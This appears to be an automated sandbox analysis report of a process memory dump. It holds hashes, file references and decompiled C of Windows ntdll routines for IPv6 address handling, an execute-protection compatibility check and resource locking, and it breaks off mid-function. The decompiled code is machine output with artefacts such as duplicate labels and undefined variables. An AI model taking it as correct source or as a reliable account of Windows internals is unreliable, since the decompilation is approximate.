Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: e18aa1027c2942479923e49f39e2355ef77efa63e43858139714a15a15f3c447
Instruction ID: 989a5ba387ad8747fc3b249e53e88b119af3be77e530e09ced25795112581c8e
Opcode Fuzzy Hash: e18aa1027c2942479923e49f39e2355ef77efa63e43858139714a15a15f3c447
Instruction Fuzzy Hash: 65F1D6B1D00249EFCB11EF99C981EEEBBB8FB09304F14446AE505E7261EB34DA45DB51

Uniqueness

Uniqueness Score: -1.00%

Function 009013CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E009013CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E008F7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x8c2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E008F7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x8c9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E008F7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E008F7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E008F7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E008F7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x009013d5
0x009013d9
0x009013dc
0x009013de
0x009013e1
0x009013e8
0x009013ee
0x0092e8fd
0x00000000
0x0092e921
0x0092e921
0x0092e928
0x0092e982
0x0092e98a
0x00000000
0x0092e99a
0x0092e99e
0x0092e9a3
0x0092e9a8
0x0092e9b9
0x0092e978
0x00000000
0x0092e978
0x0092e98a
0x0092e92a
0x0092e931
0x0092e944
0x0092e944
0x0092e950
0x0092e954
0x0092e959
0x0092e95e
0x0092e963
0x0092e970
0x00000000
0x0092e975
0x0092e93b
0x0092e980
0x00000000
0x0092e980
0x0092e942
0x0092e94b
0x00000000
0x0092e94b
0x00000000
0x0092e942
0x009013f4
0x009013f4
0x009013f9
0x009013fc
0x009013ff
0x00901406
0x0092e9cc
0x0092e9d2
0x0092e9d2
0x0092e9cc
0x0090140c
0x00901411
0x00901431
0x0090143a
0x0090143c
0x0090143f
0x0090143f
0x00901442
0x00901447
0x009014a8
0x009014ac
0x0092e9e2
0x0092e9e7
0x0092e9ec
0x0092ea05
0x0092ea05
0x00000000
0x00901449
0x00000000
0x00901449
0x0090144c
0x00901459
0x00901462
0x00901469
0x0090146a
0x00901470
0x00901473
0x00901476
0x00901476
0x00901490
0x00901495
0x0090138e
0x00901390
0x00901397
0x00901398
0x00901399
0x009013a1
0x009013a4
0x009013a4
0x00901498
0x0090149c
0x0090149f
0x009014a2
0x00000000
0x00000000
0x009014a4
0x00000000
0x009014a4
0x00901413
0x00901415
0x00901416
0x00901419
0x0090141c
0x00901422
0x009013b7
0x009013bc
0x009013bf
0x009013bf
0x009013c2
0x00901424
0x00901424
0x00901424
0x00901427
0x0090142b
0x0090142c
0x0090142c
0x0090142c
0x00000000
0x0090141c
0x00901411

APIs

___swprintf_l.LIBCMT ref: 0090146B
___swprintf_l.LIBCMT ref: 00901490
___swprintf_l.LIBCMT ref: 0092E970

Strings

:%u.%u.%u.%u, xrefs: 0092E9F4
::%hs%u.%u.%u.%u, xrefs: 0092E967
ffff:, xrefs: 0092E94B
::ffff:0:%u.%u.%u.%u, xrefs: 0092E9B0

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 937953ed3182704c770eb6fef624c719519ecc7aca5451cb0d39e678ab9dd9df
Instruction ID: 26dd280639aa35ff1518d688614d283b3e45a4d6647a5f07612772d2cd1dfbaf
Opcode Fuzzy Hash: 937953ed3182704c770eb6fef624c719519ecc7aca5451cb0d39e678ab9dd9df
Instruction Fuzzy Hash: 576137B5900655AECB24DF6DC8808BFBBB9FF94300B54C56EF5D687691D334AA80CB60

Uniqueness

Uniqueness Score: -1.00%

Function 008F7EFD, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E008F7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x9a2088; // 0x77413135
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E008F7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00913F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E008CDFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x9a4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00913F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E008D0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00913F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E008D8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00913F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0093E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00913F92();
					_t38 = 1;
					L2:
					return E008CE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x008f7f08
0x008f7f0f
0x008f7f12
0x008f7f1b
0x008f7f31
0x00913ead
0x00913eb4
0x00000000
0x00000000
0x00913eba
0x00913ecd
0x00913ed2
0x00913ee1
0x00913ee7
0x00913eec
0x00913f12
0x00913f18
0x00913f1a
0x00000000
0x00000000
0x00913f20
0x00913f26
0x00913f28
0x00000000
0x00000000
0x00913f2e
0x00913f30
0x00000000
0x00000000
0x00913f3a
0x00913f3b
0x00913f53
0x00913f64
0x00913f69
0x00913f6c
0x00913f6d
0x00913f6f
0x0091e304
0x0091e30f
0x0091e315
0x0091e31e
0x0091e321
0x0091e327
0x0091e329
0x00000000
0x00000000
0x00000000
0x00000000
0x0091e32f
0x0091e32f
0x0091e337
0x0091e33a
0x0091e33b
0x0091e33d
0x0091e33f
0x0091e341
0x0091e341
0x0091e34e
0x0091e353
0x0091e358
0x0091e35d
0x0091e35f
0x00000000
0x00000000
0x0091e365
0x0091e365
0x0091e368
0x0091e36e
0x00000000
0x00000000
0x0091e374
0x0091e32f
0x00913f75
0x00913f7a
0x00913f7c
0x00913f7e
0x00913f86
0x008f7f39
0x008f7f47
0x008f7f47
0x008f7f37
0x008f7f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00913F12

Strings

CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00913F4A
CLIENT(ntdll): Processing section info %ws..., xrefs: 0091E345
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00913F75
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0091E2FB
51Aw, xrefs: 008F7F08
ExecuteOptions, xrefs: 00913F04
Execute=1, xrefs: 00913F5E
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00913EC4

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: 51Aw$CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-1514548927
Opcode ID: 587eb052462a409617d44b0b7c4cea4380ff929dee154fb6fa9d0afda70bf443
Instruction ID: d6785467c0747741815115a6e70cceee07e207a6ec2b549953a9dbe8ff2c79af
Opcode Fuzzy Hash: 587eb052462a409617d44b0b7c4cea4380ff929dee154fb6fa9d0afda70bf443
Instruction Fuzzy Hash: F2419971A4031C7AEF209AA4DCC6FEA73BCFF58700F0005A9B615E61C1EA70DA858B61

Uniqueness

Uniqueness Score: -1.00%

Function 00900B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00900B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E008D8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E008CDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00900CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00900CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E009006BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E009006BA(_t135, _t178) == 0 || E00900A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00900CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00900CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E009006BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E009006BA(_t124, _t142) == 0 || E00900A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x00900b21
0x00900b24
0x00900b27
0x00900b2a
0x00900b2d
0x00900b30
0x00900b33
0x00900b36
0x00900b39
0x00900b3e
0x00900c65
0x00900c68
0x00900c6a
0x00900c6f
0x0092eb42
0x00000000
0x00000000
0x0092eb48
0x0092eb48
0x00900c75
0x00900c7a
0x0092eb54
0x00000000
0x00000000
0x00000000
0x0092eb5a
0x00900c80
0x00900c84
0x0092eb98
0x00000000
0x00000000
0x0092eba6
0x00900cb8
0x00900cba
0x00900cd3
0x00900cda
0x00900ce4
0x00900ce9
0x00000000
0x00900cec
0x00900c8c
0x0092eb63
0x00000000
0x00000000
0x0092eb70
0x0092eb75
0x0092eb7d
0x00000000
0x00000000
0x0092eb8c
0x00000000
0x0092eb8c
0x00900c96
0x00000000
0x00000000
0x00900ca2
0x00900cac
0x00900cb4
0x00000000
0x00000000
0x00900b44
0x00900b47
0x00900b49
0x00000000
0x00000000
0x00900b4f
0x00900b50
0x00000000
0x00000000
0x00900b56
0x00900b62
0x00900b7c
0x00900bac
0x00900a0f
0x0092eaaa
0x00000000
0x0092eac4
0x0092eac4
0x00900bd0
0x00900bd0
0x00900bd4
0x00900bd9
0x00000000
0x00000000
0x00900bdb
0x00900be0
0x0092eb0e
0x00900a1a
0x00000000
0x00900a1a
0x0092eb1a
0x0092eb1f
0x0092eb27
0x00000000
0x00000000
0x0092eb36
0x00000000
0x0092eb36
0x00900bea
0x00000000
0x00000000
0x00900bf6
0x00900c00
0x00900c03
0x00900c0b
0x00000000
0x00900c0b
0x0092eaaa
0x00000000
0x00900a15
0x00900bb6
0x00000000
0x00900bc6
0x00900bc6
0x00900bcb
0x00900c15
0x00000000
0x00000000
0x00900c1d
0x00900c20
0x00900c21
0x00900c24
0x00900c24
0x00900c26
0x00000000
0x00900c26
0x00900bcd
0x00000000
0x00900bcd
0x00900b89
0x00900b89
0x00900b90
0x00000000
0x00000000
0x00900b96
0x00000000
0x00900b96
0x00900a04
0x00900a04
0x00900b9a
0x00900b9a
0x00900b9b
0x00900b9f
0x00000000
0x00000000
0x00000000
0x00900ba5
0x00900ac7
0x00900aca
0x0092eacf
0x00000000
0x0092eade
0x0092eade
0x0092eae3
0x00000000
0x00000000
0x0092eaf3
0x0092eaf6
0x0092eaf7
0x0092eafe
0x0092eb01
0x00000000
0x0092eb01
0x0092eacf
0x00900ad0
0x00900ad4
0x00000000
0x00000000
0x00900ada
0x00900ae6
0x00900c34
0x00000000
0x00900c47
0x00900c49
0x00900c4a
0x00900c4e
0x00900c51
0x00900c54
0x00900c57
0x00900c5a
0x00000000
0x00000000
0x00000000
0x00900c60
0x00900afb
0x00900afe
0x00900b02
0x00900b05
0x00900b08
0x00000000
0x00900b08
0x00900ae6
0x00900b44
0x009009f8
0x009009f8
0x009009f9
0x00000000
0x00000000
0x0092eaa0
0x00000000

APIs

__fassign.LIBCMT ref: 00900BF6
__fassign.LIBCMT ref: 00900CA2

Strings

:, xrefs: 00900BA9
., xrefs: 00900A0C
:, xrefs: 00900AC7

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: 759d062b201271faa9d41a037277465b0e31306e5b9c2d292e436fb1f884d6e6
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: 2EA19D71D0031AEFEF24CF64C8457BEB7B9AF95704F24856AD882A72C1D7349A41CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00900554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00900554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009a01c0;
									_push(_t144);
									_push(0);
									_t51 = E008BF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00904FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00913F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00913F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0094217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00913F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00903915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009a01c0;
												_push(_t138);
												_push(0);
												_t58 = E008BF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00904FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00913F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00913F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0094217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00913F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00903915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E008E5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
